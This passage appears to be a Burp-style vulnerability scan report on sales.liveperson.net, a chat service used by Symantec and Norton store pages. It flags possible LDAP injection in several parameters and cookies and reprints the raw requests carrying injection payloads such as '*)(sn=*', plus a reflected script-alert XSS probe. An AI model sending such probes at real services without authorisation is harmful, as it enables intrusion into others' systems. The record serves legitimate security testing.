HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:37:50 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:37:50 GMT Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 427 lpConnLib.Process({"ResultSet": {"lpCallId":"243824564852-218836609740","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
1.6. http://sales.liveperson.net/hc/2735064/ [lpCallId parameter]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://sales.liveperson.net
Path:
/hc/2735064/
Issue detail
The lpCallId parameter appears to be vulnerable to LDAP injection attacks. The payloads 93a3bb2cb00a26ff)(sn=* and 93a3bb2cb00a26ff)!(sn=* were each submitted in the lpCallId parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=93a3bb2cb00a26ff)(sn=* &protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:33:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:33:31 GMT Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:33:31 GMT; path=/hc/2735064; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 84 lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});
Request 2
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=93a3bb2cb00a26ff)!(sn=* &protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:33:32 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:33:32 GMT Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 84 lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});
1.7. http://sales.liveperson.net/hc/71097838/ [HumanClickACTIVE cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://sales.liveperson.net
Path:
/hc/71097838/
Issue detail
The HumanClickACTIVE cookie appears to be vulnerable to LDAP injection attacks. The payloads *)(sn=* and *)!(sn=* were each submitted in the HumanClickACTIVE cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/71097838/?&site=71097838&cmd=mTagInviteShown&lpCallId=466950613539-178177123656&protV=20&lpjson=1&page=http%3A//www.symantec.com/store/products/index.jsp%3Finid%3Dus_pagenotfound_smb_store&id=9383966153&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Store%20Shop%20Products%20-%20Symantec%20Corp.&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/store/products/index.jsp?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=*)(sn=*
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:47 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:34:47 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Set-Cookie: LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; expires=Sat, 08-Sep-2012 21:34:47 GMT; path=/hc/71097838; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 343 lpConnLib.Process({"ResultSet": {"lpCallId":"466950613539-178177123656","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
Request 2
GET /hc/71097838/?&site=71097838&cmd=mTagInviteShown&lpCallId=466950613539-178177123656&protV=20&lpjson=1&page=http%3A//www.symantec.com/store/products/index.jsp%3Finid%3Dus_pagenotfound_smb_store&id=9383966153&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Store%20Shop%20Products%20-%20Symantec%20Corp.&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/store/products/index.jsp?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=*)!(sn=*
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:49 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:34:49 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 343 lpConnLib.Process({"ResultSet": {"lpCallId":"466950613539-178177123656","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
1.8. http://sales.liveperson.net/hc/71097838/ [HumanClickSiteContainerID_71097838 cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://sales.liveperson.net
Path:
/hc/71097838/
Issue detail
The HumanClickSiteContainerID_71097838 cookie appears to be vulnerable to LDAP injection attacks. The payloads *)(sn=* and *)!(sn=* were each submitted in the HumanClickSiteContainerID_71097838 cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/71097838/?&site=71097838&cmd=mTagInPage&lpCallId=465838986914-760230379877&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:-1:-1:-1; HumanClickSiteContainerID_71097838=*)(sn=* ; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603879317
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:33:40 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Set-Cookie: LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; expires=Sat, 08-Sep-2012 21:33:40 GMT; path=/hc/71097838; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:33:40 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 188 lpConnLib.Process({"ResultSet": {"lpCallId":"465838986914-760230379877","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
Request 2
GET /hc/71097838/?&site=71097838&cmd=mTagInPage&lpCallId=465838986914-760230379877&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:-1:-1:-1; HumanClickSiteContainerID_71097838=*)!(sn=* ; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603879317
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:33:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:33:41 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 188 lpConnLib.Process({"ResultSet": {"lpCallId":"465838986914-760230379877","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
1.9. http://sales.liveperson.net/hc/71097838/ [lpCallId parameter]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://sales.liveperson.net
Path:
/hc/71097838/
Issue detail
The lpCallId parameter appears to be vulnerable to LDAP injection attacks. The payloads 92b3a3f88ff05d96)(sn=* and 92b3a3f88ff05d96)!(sn=* were each submitted in the lpCallId parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/71097838/?&site=71097838&cmd=mTagStartPage&lpCallId=92b3a3f88ff05d96)(sn=* &protV=20&lpjson=1&page=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps6ed59%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E0e8182bf4be&id=9609075416&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-business-english&activePlugin=none&cobrowse=true&PV%21unit=sales-business&PV%21Section=Products&PV%21BusinessPageCategory=Overview&PV%21ProductFamily=Information%20Risk%20%26%20Compliance&PV%21ProductName=VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&PV%21ProductId=fds&PV%21pageLoadTime=2%20sec&PV%21visitorActive=1&SV%21language=english&SV%21MarketTier=&title=Risk-Based%20Authentication%2C%20Fraud%20Detection%2C%20Identity%20Theft%20Protection%20-%20VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&referrer=http%3A//burp/show/2&cookie=s_vi%3D%5BCS%5Dv1%7C2735422985161DC5-600001A3801B01DD%5BCE%5D%3B%20IS3_History%3D0-0-0____%3B%20IS3_GSV%3DDPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20s_pers%3D%2520s_nr%253D1315621972496-New%257C1336357972496%253B%2520event69%253Devent69%257C1336357972499%253B%3B%20s_sess%3D%2520s_sv_sid%253D806960442771%253B%2520s_cc%253Dtrue%253B%2520s_sq%253D%253B%3B%20s_sv_112_s1%3D1@16@a//1315621570007%3B%20s_sv_112_p1%3D1@25@s/6036/5742/5736/5417%26e/9 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:23 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:34:23 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Secondary1; path=/hc/71097838 Set-Cookie: LivePersonID=-5110247826455-1315604062:-1:1315604022:-1:-1; expires=Sat, 08-Sep-2012 21:34:23 GMT; path=/hc/71097838; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 84 lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});
Request 2
GET /hc/71097838/?&site=71097838&cmd=mTagStartPage&lpCallId=92b3a3f88ff05d96)!(sn=* &protV=20&lpjson=1&page=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps6ed59%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E0e8182bf4be&id=9609075416&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-sales-business-english&activePlugin=none&cobrowse=true&PV%21unit=sales-business&PV%21Section=Products&PV%21BusinessPageCategory=Overview&PV%21ProductFamily=Information%20Risk%20%26%20Compliance&PV%21ProductName=VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&PV%21ProductId=fds&PV%21pageLoadTime=2%20sec&PV%21visitorActive=1&SV%21language=english&SV%21MarketTier=&title=Risk-Based%20Authentication%2C%20Fraud%20Detection%2C%20Identity%20Theft%20Protection%20-%20VeriSign%20Identity%20Protection%20Fraud%20Detection%20Service&referrer=http%3A//burp/show/2&cookie=s_vi%3D%5BCS%5Dv1%7C2735422985161DC5-600001A3801B01DD%5BCE%5D%3B%20IS3_History%3D0-0-0____%3B%20IS3_GSV%3DDPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20s_pers%3D%2520s_nr%253D1315621972496-New%257C1336357972496%253B%2520event69%253Devent69%257C1336357972499%253B%3B%20s_sess%3D%2520s_sv_sid%253D806960442771%253B%2520s_cc%253Dtrue%253B%2520s_sq%253D%253B%3B%20s_sv_112_s1%3D1@16@a//1315621570007%3B%20s_sv_112_p1%3D1@25@s/6036/5742/5736/5417%26e/9 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:34:24 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Secondary1; path=/hc/71097838 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 84 lpConnLib.Process({"ResultSet": {"lpCallId":"","lpCallError":"REQUEST_NOT_VALID"}});
1.10. http://sales.liveperson.net/hc/71097838/ [protV parameter]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://sales.liveperson.net
Path:
/hc/71097838/
Issue detail
The protV parameter appears to be vulnerable to LDAP injection attacks. The payloads *)(sn=* and *)!(sn=* were each submitted in the protV parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=*)(sn=* &lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:35:23 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:35:23 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Set-Cookie: LivePersonID=-5110247826455-1315604120:-1:1315604070:-1:-1; expires=Sat, 08-Sep-2012 21:35:23 GMT; path=/hc/71097838; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 427 lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
Request 2
GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=*)!(sn=* &lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:35:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:35:24 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 427 lpConnLib.Process({"ResultSet": {"lpCallId":"466464716009-798532190732","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
1.11. http://sales.liveperson.net/hc/71097838/ [t parameter]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://sales.liveperson.net
Path:
/hc/71097838/
Issue detail
The t parameter appears to be vulnerable to LDAP injection attacks. The payloads *)(sn=* and *)!(sn=* were each submitted in the t parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/71097838/?&site=71097838&cmd=mTagInviteTimeout&lpCallId=466464716009-798532190732&protV=20&lpjson=1&page=http%3A//store.symantec.com/%3Finid%3Dus_pagenotfound_smb_store&id=4734450057&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-store-business-english&activePlugin=none&cobrowse=true&title=Buy%20Symantec%20Business%20Products%20-%20Shop%20Small%20Business%20%7C%20Symantec%20Business%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&timeout=120&channel=web&t=*)(sn=* HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://store.symantec.com/?inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=1932846460867730791; LivePersonID=-5110247826455-1315603877:-1:1315603882:-1:-1; HumanClickSiteContainerID_71097838=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147
Response 1
